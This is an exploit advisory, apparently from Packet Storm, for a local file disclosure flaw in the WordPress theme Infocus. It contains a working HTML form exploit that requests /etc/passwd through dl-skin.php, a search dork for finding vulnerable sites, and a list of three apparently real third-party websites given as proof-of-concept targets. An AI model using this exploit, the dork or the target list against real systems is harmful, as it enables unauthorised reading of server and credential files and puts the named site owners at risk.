WordPress Infocus Local File Disclosure

2014-06-06T00:00:00
ID PACKETSTORM:126988
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-06-06T00:00:00

Description

                                        
                                            `[+] Post Local File Disclosure in wordpress theme Infocus   
  
[+] Date: 07/06/2014  
  
[+] CWE Number: CWE-98  
  
[+] Risk: High  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Dork:inurl:"/wp-content/themes/infocus/"  
  
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: Windows 7 and Linux  
  
[+] Vulnerable File: dl-skin.php  
  
[+] Exploit :   
  
<html>  
<body>  
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">  
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>  
<input type="submit">  
</form>  
</body>  
</html>  
  
[+] PoC: http://www.sonorabehavioral.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
http://www.harmonyhouse.uk.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
http://foulaneautoecole.com/wp-content/themes/infocus/lib/scripts/dl-skin.php  
  
  
eof  
`